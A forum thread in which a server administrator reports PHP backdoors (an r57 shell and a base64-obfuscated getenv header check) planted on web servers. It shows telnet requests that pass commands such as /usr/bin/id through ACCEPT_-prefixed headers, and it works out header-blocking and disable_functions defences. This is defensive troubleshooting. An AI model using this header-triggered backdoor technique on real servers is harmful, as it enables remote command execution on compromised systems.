[SOLVED] hacked.. issues with denying certain functions

[jeev]

so i do free lance administration, i really dont know much about coding in PHP but i can figure some out. i've set up monitoring scripts on all 200 servers and they're a pretty big adult company.. they have an in house programmer, he's good.. but somethings just keep getting through.

 

this is the second time.. the first 100 times i found r57 shell and stuff like that on the servers. now i'm finding these:

 

$verify_member = getenv(base64_decode("SFRUUF9BQ0NFUFRfU0lMVkVSVEVBTQ=="));

 

i guess that pretty much comes out to ACCEPT_SILVERTEAM and i've tested it.. you can force a lot of things with that.. example:

 

$ telnet www.x 80

Trying x...

Connected to x.

Escape character is '^]'.

GET /treepad/pics/temp/lol.php HTTP/1.1

Host: www.x

ACCEPT_xfiles: /usr/bin/id

 

HTTP/1.1 200 OK

Date: Sun, 22 Jul 2007 06:29:15 GMT

Server: Apache/2.0.54 (Fedora)

X-Powered-By: PHP/5.0.4

Content-Length: 62

Connection: close

Content-Type: text/html

 

uid=48(apache) gid=48(apache) groups=48(apache),2523(psaserv)

 

that was the first script, second one was the same pretty much.. you can pass, have it download.. blah blah more backdoors.

 

how do i prevent this? other than good coding? a) i dont think they use base64 decode so i'd like to disallow that i think, i can pass that in php.ini I recall.. but how do i stop "ACCEPT_" type commands

 

thanks in advance

[trq]

I'm not sure I understand this well enough to help much, but you could quite easily create a script that searches the $_REQUEST array looking to see if it hold an ACCEPT_* key.

 

<?php

  foreach ($_REQUEST as $key) {
    if (substr($key,0,6) == 'ACCEPT_') {
      die();
    }
  }

?>

 

I'm really not sure this will help, but it may be a start.

[jeev]

thank you so much but i wouldn't even know where to begin with what you gave me... i really do not understand it.. i just would like to know how i could prevent ACCEPT_ from being passed and accepted in PHP... but first thing i'm gonna do is deny base64_decode.

[trq]

Well, providing I'm on the right track... the easiest approuch would be to place the snippet I provided in a file /usr/local/deny_accept.php

 

And then add the line....

 

auto_prepend_file "/usr/local/deny_accept.php"

 

to your php.ini.

 

Like I said, Im not 100% sure this would work, but it may be worth at least showing your programmer my idea.

[jeev]

ahh, wow. i will try it tomorrow morning and let you know. thank you so much

[jeev]

:/

 

i tried it and it still goes. i had verified

 

auto_prepend_file ... was working properly, permissions were wrong initially but they load now.. it doesn't stop it

 

Escape character is '^]'.

GET /members/j.php HTTP/1.1

Host: x

ACCEPT_SILVERTEAM: /usr/bin/id

 

HTTP/1.1 200 OK

Date: Mon, 12 Nov 2007 17:09:40 GMT

Server: Apache/1.3.37 (Unix) PHP/4.4.7

X-Powered-By: PHP/4.4.7

Transfer-Encoding: chunked

Content-Type: text/html

 

27

uid=80(www) gid=80(www) groups=80(www)

 

0

[jeev]

<?php

 

  $headers = apache_request_headers();

  foreach ($headers as $key => $value)

  {

    if (strtoupper(substr($key, 0, 7)) === 'ACCEPT_')

    {

      die();

    }

  }

 

?>

 

---

 

that worked! also, disable_functions = shell_exec and base64_decode.. we dont use base64_decode.. so i put that for now and i'm leaving the prepend out till i can make sure it doesn't break the whole environment. it's over 150 servers so.. base64_decode is fine for now cause it is not used anywhere else.